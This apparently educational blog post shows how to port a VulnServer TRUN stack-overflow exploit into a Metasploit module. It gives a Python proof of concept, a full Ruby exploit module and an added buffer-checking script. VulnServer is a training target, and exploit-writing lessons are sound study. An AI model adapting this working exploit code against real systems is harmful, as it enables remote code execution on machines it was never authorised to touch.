Porting VulnServer TRUN /.:/ exploit to Metasploit

Prerequisites: http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

BoF template used: https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the BoF tutorial using Python 🙂

The Python version of the exploit looks like this:

[cc lang="python"]
import struct
import socket

# 0x625011AF is a JMP ESP in essfunc.dll (ships with vulnserver), packed little-endian
ret = struct.pack("<I", 0x625011AF)
nop = b"\x90" * 32                  # small NOP sled in front of the shellcode
shellcode = b"\xCC\xCC\xCC"         # INT3 placeholder; use your own shellcode, bad chars \x00\x0A\x0D
# 2003 bytes of junk reach EIP, then ret, the sled, the shellcode and padding to the tested length
buffer = b"A" * 2003 + ret + nop + shellcode + b"D" * 636

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.recv(1024)                        # read the vulnserver banner
s.send(b"TRUN /.:/" + buffer)
s.close()
[/cc]

To port it to Metasploit you first need to decide what type of exploit it is: a remote Windows exploit, so the module class inherits from Msf::Exploit::Remote. [cc lang="ruby"]class Metasploit3 < Msf::Exploit::Remote[/cc]
The exploit talks to vulnserver over a TCP socket, so mix in the TCP client helpers, which provide connect, sock and disconnect. [cc lang="ruby"]include Msf::Exploit::Remote::Tcp[/cc]
Vulnserver listens on port 9999 by default, so register that as the default RPORT. [cc lang="ruby"]Opt::RPORT(9999)[/cc]
Then think about the elements of the buffer (the sploit).
The buffer starts with the "TRUN /.:/" command, followed by the junk that fills the 2003 bytes up to EIP. In Metasploit that junk is generated with make_nops() instead of "A" * 2003, so the filler is produced by the framework rather than being a fixed run of one byte.
Next we need the return address that will end up in EIP: 0x625011AF, a JMP ESP in essfunc.dll. Because that DLL ships with vulnserver and is loaded at a fixed base, rather than coming from Windows itself, the same address works regardless of the Windows version, which is why the target is called Universal.
[cc lang="ruby"]
'Targets' =>
[
['Windows XP Universal',
{ 'Ret' => 0x625011af, 'Offset' => 2003 } ], # JMP ESP in essfunc.dll, 2003 bytes to EIP
],
[/cc]
In the 'Payload' section we declare how much space is available for the shellcode and which bytes it must not contain:
[cc lang="ruby"]
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0A\x0D",
},
[/cc]
A 32-byte NOP sled is placed between the return address and the payload. After the JMP ESP, ESP points at the bytes immediately following the return address on the stack, so execution runs down the sled into the payload. The encoded payload returned by payload.encoded carries its own decoder stub and decodes itself in place, so the sled is not needed for decoding; it is there as a safety margin so that ESP does not have to point at exactly the first payload byte.
The space for the shellcode is 500 bytes here, which is enough for the common Windows payloads (an encoded staged Meterpreter or reverse shell is a few hundred bytes). It also stays within what the Python PoC already sent: after the return address the PoC had 32 NOP bytes, 3 bytes of shellcode and 636 bytes of padding, 671 bytes in total, so 500 bytes of payload plus the 32-byte sled never writes past the region that was crash-tested.
Putting this together gives the final sploit:
[cc lang="ruby"]
# pack('V') packs the address as a 32-bit little-endian value, like struct.pack("<I") in the PoC
sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
[/cc]
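Before loading the module into msfconsole it is worth checking the buffer layout outside the framework. The following plain Ruby script is an added example, not code from the original post or from Metasploit: it rebuilds the same TRUN buffer the module's exploit method produces, with make_nops stood in for by a plain 0x90 sled and payload.encoded by the three-byte INT3 placeholder from the Python PoC, and checks that the return address lands exactly at the EIP offset, that neither the packed return address nor the payload contains a bad character, that the payload fits 'Space', and that the whole buffer stays within the length the Python PoC already crashed the server with. The send_sploit helper and the check names are assumptions made for this illustration.

```ruby
# Added example: plain-Ruby model of the buffer the module's exploit method
# builds, so the layout can be checked without msfconsole. make_nops and
# payload.encoded are stand-ins, not the framework's implementations.
require 'socket'

TRUN_PREFIX = 'TRUN /.:/'.b
OFFSET      = 2003                        # bytes of junk before EIP (from the tutorial)
RET         = 0x625011af                  # JMP ESP in essfunc.dll
BAD_CHARS   = "\x00\x0a\x0d".b            # 'BadChars' in the module's Payload hash
SPACE       = 500                         # 'Space' in the module's Payload hash
TESTED_LEN  = 2003 + 4 + 32 + 3 + 636     # length of the buffer the Python PoC sent

# Stand-in for Msf's make_nops: a plain 0x90 sled (the framework generates its own).
def make_nops(n)
  "\x90".b * n
end

# Stand-in for payload.encoded: the constructed INT3 placeholder from the PoC.
def placeholder_payload
  "\xcc\xcc\xcc".b
end

# Same layout as the module: command + junk + ret (little-endian) + sled + payload.
def build_sploit(payload, offset: OFFSET, ret: RET)
  TRUN_PREFIX + make_nops(offset) + [ret].pack('V') + make_nops(32) + payload
end

# Bad-character bytes that occur in data (empty array when it is clean).
def bad_chars_in(data, bad = BAD_CHARS)
  present = data.bytes
  bad.bytes.select { |b| present.include?(b) }
end

# The checks a practitioner wants before loading the module; returns a result hash.
def check_layout(payload)
  sploit = build_sploit(payload)
  eip_at = TRUN_PREFIX.bytesize + OFFSET      # first byte that overwrites EIP
  eip    = sploit.byteslice(eip_at, 4)
  {
    eip_bytes:     eip,                                   # what the debugger should show in EIP
    eip_ok:        eip == [RET].pack('V'),
    ret_bad:       bad_chars_in([RET].pack('V')),         # address must survive the parser too
    payload_bad:   bad_chars_in(payload),
    fits_space:    payload.bytesize <= SPACE,
    within_tested: sploit.bytesize - TRUN_PREFIX.bytesize <= TESTED_LEN,
    total_len:     sploit.bytesize
  }
end

# Mirrors connect / sock.put / disconnect in the module (not exercised offline).
def send_sploit(host, port, payload)
  s = TCPSocket.new(host, port)
  s.recv(1024)                                # vulnserver banner
  s.write(build_sploit(payload))
  s.close
end

if __FILE__ == $0
  p check_layout(placeholder_payload)
end
```

Run it with ruby and compare eip_bytes with the EIP value in the debugger at the crash (it should read AF 11 50 62 in memory, 0x625011AF as a register). If 'Space' is ever raised, within_tested flags the point at which the buffer would grow past what was crash-tested.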
This makes the Metasploit module:

[cc lang="ruby"]
# Metasploit template from corelan.be
# BoF for vulnserver, thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # a remote exploit

  include Msf::Exploit::Remote::Tcp # provides connect, sock and disconnect

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Vulnserver stack overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow in the
        TRUN command of vulnserver.
      },
      'Author'      => [ 'Stephen Bradshaw', 'Duncan Winfrey' ],
      'Version'     => '$Revision: 9999 $',
      'References'  =>
        [
          [ 'Vulnserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space'    => 500,              # bytes available for the encoded payload
          'BadChars' => "\x00\x0A\x0D",   # bytes the encoder must avoid
        },
      'Platform' => 'win',

      'Targets' =>
        [
          ['Windows XP Universal',
            { 'Ret' => 0x625011af, 'Offset' => 2003 } ], # JMP ESP in essfunc.dll, 2003 bytes to EIP
        ],
      'DefaultTarget' => 0,

      'Privileged' => false
    ))

    register_options(
      [
        Opt::RPORT(9999) # vulnserver's default port
      ], self.class)
  end

  def exploit
    connect

    junk = make_nops(target['Offset']) # filler up to EIP, instead of "A" * 2003
    # command + junk + ret (32-bit little-endian) + NOP sled + encoded payload
    sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
    sock.put(sploit)

    handler # wait for the payload to connect back
    disconnect

  end

end
[/cc]

Then put the code into /opt/metasploit/msf3/modules/exploits/windows/misc as vun_server_bof.rb and run reload_all in msfconsole (or restart it) so the new module is picked up.

Then tested it out 😀
